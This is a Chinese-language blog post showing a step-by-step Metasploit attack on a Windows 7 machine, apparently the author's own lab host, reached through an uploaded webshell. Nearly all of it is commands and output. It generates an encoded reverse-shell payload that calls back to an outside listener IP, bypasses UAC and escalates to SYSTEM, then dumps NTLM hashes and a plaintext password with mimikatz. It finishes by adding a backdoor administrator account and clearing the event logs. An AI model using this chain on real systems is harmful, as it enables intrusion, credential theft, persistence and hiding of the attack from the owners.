Reber's Blog

只会一点点编程、只会一点点渗透


Metasploit 简单提权

0x00 前提

虚拟机有一个shell:http://10.11.11.20/a.php,物理机IP是211.222.222.72
外网安装msf的主机:外网IP是114.115.123.123,内网IP是192.168.0.195

0x01 查看主机基本信息

菜刀连接shell,终端执行systeminfo

C:\Apps\phpStudy\WWW\> systeminfo

主机名:           REBER-WIN7
OS 名称:          Microsoft Windows 7 专业版
OS 版本:          6.1.7600 ��ȱ Build 7600
OS 制造商:        Microsoft Corporation
OS 配置:          独立服务器
OS 构件类型:       Multiprocessor Free
注册的所有人:      reber
注册的组织:       
产品 ID:          00371-868-0000007-85272
初始安装日期:      2017/12/26, 7:23:00
系统启动时间:      2018/2/26, 9:52:14
系统制造商:        Parallels Software International Inc.
系统型号:          Parallels Virtual Platform
系统类型:          x64-based PC
处理器:           安装了 1 个处理器。
                 [01]: Intel64 Family 6 Model 70 Stepping 1 GenuineIntel ~2495 Mhz
BIOS 版本:        Parallels Software International Inc. 12.0.2 (41353), 2016/9/15
Windows 目录:     C:\Windows
系统目录:          C:\Windows\system32
启动设备:          \Device\HarddiskVolume1
系统区域设置:      zh-cn;中文(中国)
输入法区域设置:    zh-cn;中文(中国)
时区:             (GMT+08:00) 北京
物理内存总量:      4,096 MB
可用的物理内存:    2,897 MB
页面文件: 最大值:  8,189 MB
页面文件: 可用:    6,794 MB
页面文件: 使用中:  1,395 MB
页面文件位置:      C:\pagefile.sys
域:              REBER
登录服务器:       \\REBER-WIN7
修补程序:         安装了 1 个修补程序。
                  [01]: KB958488
网卡:            安装了 1 个 NIC。
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      本地连接 3
                      启用 DHCP:   是
                      DHCP 服务器: 10.11.11.1
                      IP 地址
                        [01]: 10.11.11.20
                        [02]: fe80::d509:b75f:4cc5:5628

0x02 弹出会话到Metasploit

生成payload,然后用菜刀上传到目标服务器

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=114.115.123.123 LPORT=8888 -a x86 -e x86/shikata_ga_nai -i 5 --platform windows -f exe -o 86.exe
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai chosen with final size 468
Payload size: 468 bytes
Final size of exe file: 73802 bytes
Saved as: 86.exe

# -p 指定payload(用msfvenom -l payloads可查看所有payload)
# -a 指定目标指令集架构
# -e 指定用什么编码器编码(多次编码变幻可以免杀,用msfvenom -l encoders可查看编码类型)
# -i 指定编码迭代的次数
# --platform 执行目标的平台
# -f 指定输出格式,可用msfvenom --help-formats查看

msf监听,等待payload执行

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(multi/handler) > set LPORT 8888
LPORT => 8888
# autorunscript: 目标上线后执行命令将进程迁移到了资源管理器,防止用户删除木马,然后丢失目标的情况
msf exploit(multi/handler) > set autorunscript migrate -n explorer.exe
autorunscript => migrate -n explorer.exe
msf exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     0.0.0.0          yes       The listen address
   LPORT     8888             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
msf exploit(multi/handler) >
[*] Started reverse TCP handler on 0.0.0.0:8888

msf exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                          Payload opts
  --  ----                    -------                          ------------
  0   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://0.0.0.0:8888

msf exploit(multi/handler) > sessions

Active sessions
===============

No active sessions.

msf exploit(multi/handler) >

通过菜刀执行上传的aa.exe,菜刀显示执行错误,但是msf已经成功与目标建立了一个会话

msf exploit(multi/handler) >
[*] Sending stage (179779 bytes) to 211.222.222.72
[*] Meterpreter session 1 opened (192.168.0.195:8888 -> 211.222.222.72:34576) at 2018-02-26 12:26:32 +0800

msf exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x86/windows  REBER-WIN7\reber @ REBER-WIN7  192.168.0.195:8888 -> 211.222.222.72:34576 (10.11.11.20)

msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls
Listing: C:\Users\reber\Desktop
===============================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100777/rwxrwxrwx  73802   fil   2018-02-26 12:02:38 +0800  aa.exe
100666/rw-rw-rw-  282     fil   2017-12-25 15:24:08 +0800  desktop.ini
100666/rw-rw-rw-  9029    fil   2018-02-07 00:14:51 +0800  ftptrace.txt
100666/rw-rw-rw-  108     fil   2018-02-06 23:55:17 +0800  users.dat
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) >

0x03 提权

前面通过systeminfo得知为Win7主机,只有一个补丁,直接尝试绕过UAC进行提权

msf exploit(multi/handler) > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/local/bypassuac) > options

Module options (exploit/windows/local/bypassuac):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SESSION                     yes       The session to run this module on.
   TECHNIQUE  EXE              yes       Technique to use if UAC is turned off (Accepted: PSH, EXE)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(windows/local/bypassuac) > set session 1
session => 1
msf exploit(windows/local/bypassuac) > set LHOST 114.115.123.123
LHOST => 114.115.123.123
msf exploit(windows/local/bypassuac) > set LPORT 6666
LPORT => 6666
msf exploit(windows/local/bypassuac) > options

Module options (exploit/windows/local/bypassuac):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SESSION    1                yes       The session to run this module on.
   TECHNIQUE  EXE              yes       Technique to use if UAC is turned off (Accepted: PSH, EXE)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     114.115.123.123   yes       The listen address
   LPORT     6666             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(windows/local/bypassuac) > run

[-] Handler failed to bind to 114.115.123.123:6666:-  -
[*] Started reverse TCP handler on 0.0.0.0:6666
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (179779 bytes) to 211.222.222.72
[*] Meterpreter session 2 opened (192.168.0.195:6666 -> 211.222.222.72:39027) at 2018-02-26 16:29:34 +0800

meterpreter > getuid
Server username: REBER-WIN7\reber
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

0x04 获得用户名密码

meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID   Package    Domain        User           Password
------   -------    ------        ----           --------
0;69053  NTLM       REBER-WIN7    reber          lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;69036  NTLM       REBER-WIN7    reber          lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
0;996    Negotiate  REBER         REBER-WIN7$    n.s. (Credentials KO)
0;27026  NTLM                                    n.s. (Credentials KO)
0;999    NTLM       REBER         REBER-WIN7$    n.s. (Credentials KO)

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID   Package    Domain        User           Password
------   -------    ------        ----           --------
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996    Negotiate  REBER         REBER-WIN7$
0;27026  NTLM
0;999    NTLM       REBER         REBER-WIN7$
0;69053  NTLM       REBER-WIN7    reber          123456
0;69036  NTLM       REBER-WIN7    reber          123456

meterpreter >

0x05 添加用户

meterpreter > shell
Process 2020 created.
Channel 1 created.
Microsoft Windows [▒汾 6.1.7600]
▒▒Ȩ▒▒▒▒ (c) 2009 Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒

C:\Windows\system32>net user hacker 123456 /add
net user hacker 123456 /add
▒▒▒▒ɹ▒▒▒ɡ▒


C:\Windows\system32>net localgroup administrators hacker /add
net localgroup administrators hacker /add
▒▒▒▒ɹ▒▒▒ɡ▒

0x06 清理痕迹

meterpreter > clearev